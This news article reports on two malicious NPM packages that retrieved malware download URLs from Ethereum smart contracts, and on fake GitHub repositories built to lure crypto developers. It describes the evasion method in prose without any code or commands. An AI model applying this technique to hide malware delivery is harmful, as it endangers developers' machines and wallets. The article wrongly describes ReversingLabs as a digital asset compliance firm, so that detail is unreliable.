- Two NPM packages used Ethereum smart contracts to conceal malicious URLs and install downloader malware
- Attackers built fake GitHub repositories with fabricated commits and multiple accounts to boost credibility.
- At least 23 crypto-related malware campaigns hit open-source repositories in 2024, showing evolving attack tactics.
Cybersecurity researchers have identified a new method used by hackers to distribute malware through Ethereum smart contracts. ReversingLabs, a digital asset compliance firm, uncovered two malicious NPM packages that embedded hidden commands within Ethereum’s blockchain. The technique allowed attackers to bypass conventional security scans by masking malicious URLs as blockchain interactions.
The discovery shows how attackers adapted open-source repositories as attack surfaces. The NPM packages, “colortoolsv2” and “mimelib2,” were uploaded in July and acted as downloaders. Rather than hosting harmful links directly, they pulled command and control addresses stored inside Ethereum smart contracts.
How the Attack Worked
Once installed on a device, the packages contacted the blockchain to retrieve hidden URLs. These addresses then directed the system to download second-stage malware. The additional payload executed the intended malicious activity. Because the traffic appeared as legitimate blockchain queries, detection became more difficult for traditional monitoring tools.
ReversingLabs researcher Lucija Valentić explained the approach in a blog post. She noted that while blockchain-linked malware has appeared before, this particular method introduced a new evasion strategy. Hosting malicious instructions within smart contracts allowed the attackers to obscure their operations inside Ethereum’s decentralized environment.
Broader Social Engineering Campaign
The malware packages were not isolated incidents but part of a larger social engineering effort. Threat actors established convincing GitHub repositories designed to resemble legitimate cryptocurrency trading bots. These repositories included fabricated commits, multiple fake maintainer accounts, and carefully written documentation to appear authentic.
Researchers noted that attackers also created fake user accounts to follow repositories and simulate community interest. These steps increased the credibility of the repositories and tricked developers into downloading compromised code.
Evolution of Repository Attacks
Security teams recorded at least 23 crypto-related malware campaigns on open-source repositories in 2024 alone. According to ReversingLabs, this recent campaign demonstrated an evolution in tactics. Combining blockchain functionality with deception strategies presented new challenges for defenders.
Although Ethereum was the focus of the latest report, other platforms have been exploited in similar ways. In April, a fake GitHub repository posing as a Solana trading bot distributed malware that stole crypto wallet credentials. Attackers have also targeted Bitcoin-related libraries, such as “Bitcoinlib,” by embedding malicious code to compromise development environments.
The use of Ethereum smart contracts to host malicious commands underscores the complexity of current threats. ReversingLabs emphasized that smart contracts in this case were not exploited for vulnerabilities but deliberately used to store and distribute URLs. This method created an indirect channel for delivering malware while avoiding immediate detection.
Earn more PRC tokens by sharing this post. Copy and paste the URL below and share to friends, when they click and visit Parrot Coin website you earn: https://parrotcoin.net0
PRC Comment Policy
Your comments MUST BE constructive with vivid and clear suggestion relating to the post.
Your comments MUST NOT be less than 5 words.
Do NOT in any way copy/duplicate or transmit another members comment and paste to earn. Members who indulge themselves copying and duplicating comments, their earnings would be wiped out totally as a warning and Account deactivated if the user continue the act.
Parrot Coin does not pay for exclamatory comments Such as hahaha, nice one, wow, congrats, lmao, lol, etc are strictly forbidden and disallowed. Kindly adhere to this rule.
Constructive REPLY to comments is allowed